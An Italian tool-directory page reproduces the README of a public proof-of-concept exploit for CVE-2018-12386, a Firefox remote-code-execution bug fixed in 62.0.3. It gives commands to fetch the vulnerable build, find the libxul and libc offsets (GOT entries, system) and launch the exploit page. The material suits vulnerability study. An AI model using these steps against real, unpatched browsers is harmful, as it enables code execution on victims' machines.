Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2018-12386 — CVE-2018-12386 - Exploit di RCE sandboxato di Firefox per Linux (Firefox <v62.0.3) | Kitploit
Strumenti/GitHubGitHub/0xlyte/cve-2018-12386
Analisi delle VulnerabilitàExploitApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHub0xlyte/cve-2018-12386

cve-2018-12386

CVE-2018-12386 - Exploit di RCE sandboxato di Firefox per Linux (Firefox <v62.0.3)

Vedi Repository
26 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE in Sandbox di Firefox (CVE-2018-12386)

Ecco un semplice exploit per la vulnerabilità CVE-2018-12386 scoperta da Niklas Baumstark, Samuel Groß e Bruno Keith.

Questo è principalmente un PoC che ho realizzato per divertimento, non c'è alcun bypass della sandbox e funzionerà solo su una specifica configurazione Linux dove gli offset usati dall'exploit sono già noti (possono essere cambiati in exploit/offsets.js).

Questo exploit funziona per le versioni precedenti a Firefox 62.0.3 e Firefox ESR 60.2.2.

Scaricare Firefox per Testare l'Exploit

Puoi scaricare le versioni passate di Firefox direttamente dal server FTP di Mozilla: https://ftp.mozilla.org/pub/firefox/releases/

Puoi usare, ad esempio, la versione 62.0.2 per Linux 64-bit: https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2.

root@kitploit:~
wget https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2
bzip2 -d firefox-62.0.2.tar.bz2
tar xvf firefox-62.0.2.tar

Trovare gli Offset

Offset di libxul.so

libxul_math_max

Se stai usando Firefox 62.0.2, gli offset forniti in exploit/offsets.js dovrebbero essere quelli corretti.

Per altre versioni, un modo semplice è usare la primitiva addrof per far trapelare l'indirizzo della funzione JavaScript Math.max, quindi trovare l'indirizzo base di libxul.so per l'istanza di Firefox che stai attualmente sfruttando (con cat /proc/$(pidof firefox)/maps per esempio) e sottrarre i due per ottenere l'offset libxul_math_max.

libxul_got_memmove & libxul_got_tolower

Se stai usando Firefox 62.0.2, gli offset forniti in exploit/offsets.js dovrebbero essere quelli corretti.

Per altre versioni, un modo semplice è usare objdump.

root@kitploit:~
[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i memmove@GLIBC
  8006f0:   ff 25 7a ac 40 05       jmpq   *0x540ac7a(%rip)        # 5c0b370 <memmove@GLIBC_2.2.5>

[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i tolower@GLIBC
  8052e0:	ff 25 82 86 40 05    	jmpq   *0x5408682(%rip)        # 5c0d968 <tolower@GLIBC_2.2.5>

5c0b370 e 5c0d968 sono i valori di cui abbiamo bisogno, cioè l'offset di memmove e tolower in libxul.so.

Offset di libc.so.6

Questi offset dipendono completamente dalla versione di libc che usi.

root@kitploit:~
# libc.so.6 location

[lyte@vm firefox-62.0.2]$ ldd /bin/ls | grep libc.so.6 | cut -d' ' -f3
/lib/x86_64-linux-gnu/libc.so.6

libc_tolower

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " tolower$"
000000000002c0f0 T tolower

libc_system

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " system$"
000000000003f480 W system

Testare l'Exploit

Una volta che hai Firefox e gli offset corretti, puoi testare l'exploit lanciando il seguente comando:

root@kitploit:~
MOZ_DISABLE_CONTENT_SANDBOX=1 /path/to/vulnerable/firefox /path/to/cve-2018-12386/exploit/pwn.html

Demo

Contatto

Se vuoi salutare: @lyte__

Scarica lo strumento